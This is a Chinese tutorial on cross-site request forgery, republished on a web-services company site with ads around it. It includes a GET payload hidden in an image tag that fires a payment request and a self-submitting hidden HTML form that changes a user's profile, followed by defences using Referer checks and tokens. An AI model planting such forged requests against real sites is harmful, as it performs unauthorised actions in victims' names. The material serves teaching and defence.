CSRF漏洞分析利用及防御-創(chuàng)新互聯(lián)

0x00 簡要介紹

東城網站建設公司創(chuàng)新互聯(lián),東城網站設計制作,有大型網站制作公司豐富經驗。已為東城上千提供企業(yè)網站建設服務。企業(yè)網站搭建\成都外貿網站制作要多少錢,請找那個售后服務好的東城做網站的公司定做!

    CSRF(Cross-site request forgery)跨站請求偽造,由于目標站無 token/refer 限制,導致***者可以以用戶的身份完成操作達到各種目的。根據(jù)HTTP請求方式,CSRF利用方式可分為兩種

0x01 GET類型的CSRF

   這種類型的CSRF一般是由于程序員安全意思不強造成的。GET類型的CSRF利用非常簡單,只需要構造一個HTTP請求,

一般會這樣利用:

<img src="http://a.ioio.pub:8000/users/pay?uid=122&monery=10000" \>

當目標加載這個圖片時會自動加載鏈接,這時就能完成***了。

例如:在一個留言或博客論壇的環(huán)境中,當留言內容沒有經過過濾時,可以按照上面的方法構造一個刪除該文章的圖片鏈接。當目標查看博客留言時,因為是圖片標簽,所以瀏覽器會自動加載該URL這時,目標處于登錄狀態(tài),那么該文章就會被刪除。這種就是CSRF-GET請求的一種利用。

0x02 POST類型的CSRF

   所謂POST類型就是構造一個自動提交的表單,當目標點擊給標簽時,就會以POST的方式發(fā)送一次HTTP請求。

<!DOCTYPE html>
<html>
<head>
    <title>test csrf</title>
</head>
<body>
<body>
    <form name="csrf" action="http://acm.xxxxx.net/JudgeOnline/profile_modify.php?action=modify" method="post" enctype="multipart/form-data">
        <input type="hidden" name="email" value="123456@qq.com">
        <input type="hidden" name="qq" value="123456">
        <input type="hidden" name="telephone" value="12345678901">
        <input type="hidden" name="bloglink" value="smdx">
        <input type="hidden" name="description" value="xmsdx">
    </form>
    <script>document.csrf.submit();</script>
</body>
</html>

以上內容就是一個可以自動提交的表單,當用戶觸發(fā)時,發(fā)送一次HTTP請求,修改個人信息。

0x03 如何修復

   針對CSRF的防范:

   關鍵的操作只接受POST請求,并且添加驗證碼。

   CSRF***的工程,往往是用戶在不知情的情況下觸發(fā)的,當添加驗證碼或確認操作時,就可以簡單而有效防御CSRF了。

     檢測refer

常見的互聯(lián)網頁面與頁面之間是存在聯(lián)系的,比如你在www.baidu.com應該是找不到通往www.google.com的鏈接的,再比如你在 論壇留言,那么不管你留言后重定向到哪里去了,之前的那個網址一定會包含留言的輸入框,這個之前的網址就會保留在新頁面頭文件的Referer中

通過檢查Referer的值,我們就可以判斷這個請求是合法的還是非法的,但是問題出在服務器不是任何時候都能接受到Referer的值,所以Refere Check 一般用于監(jiān)控CSRF***的發(fā)生,而不用來抵御***。

     Token

目前主流的做法是使用Token抵御CSRF***。下面通過分析CSRF ***來理解為什么Token能夠有效

CSRF***要成功的條件在于***者能夠預測所有的參數(shù)從而構造出合法的請求。所以根據(jù)不可預測性原則,我們可以對參數(shù)進行加密從而防止CSRF***。

另一個更通用的做法是保持原有參數(shù)不變,另外添加一個參數(shù)Token,其值是隨機的。這樣***者因為不知道Token而無法構造出合法的請求進行***。

Token 使用原則

Token要足夠隨機————只有這樣才算不可預測
Token是一次性的,即每次請求成功后要更新Token————這樣可以增加***難度,增加預測難度
Token要注意保密性————敏感操作使用post,防止Token出現(xiàn)在URL中
                                                                 ---參照學習與烏云drops

另外有需要云服務器可以了解下創(chuàng)新互聯(lián)scvps.cn,海內外云服務器15元起步,三天無理由+7*72小時售后在線,公司持有idc許可證,提供“云服務器、裸金屬服務器、高防服務器、香港服務器、美國服務器、虛擬主機、免備案服務器”等云主機租用服務以及企業(yè)上云的綜合解決方案,具有“安全穩(wěn)定、簡單易用、服務可用性高、性價比高”等特點與優(yōu)勢,專為企業(yè)上云打造定制,能夠滿足用戶豐富、多元化的應用場景需求。

標題名稱:CSRF漏洞分析利用及防御-創(chuàng)新互聯(lián)
文章路徑:http://muchs.cn/article48/dsiiep.html

成都網站建設公司_創(chuàng)新互聯(lián),為您提供動態(tài)網站小程序開發(fā)、電子商務服務器托管、網站設計Google

廣告

聲明:本網站發(fā)布的內容(圖片、視頻和文字)以用戶投稿、用戶轉載內容為主,如果涉及侵權請盡快告知,我們將會在第一時間刪除。文章觀點不代表本網站立場,如需處理請聯(lián)系客服。電話:028-86922220;郵箱:631063699@qq.com。內容未經允許不得轉載,或轉載時需注明來源: 創(chuàng)新互聯(lián)

微信小程序開發(fā)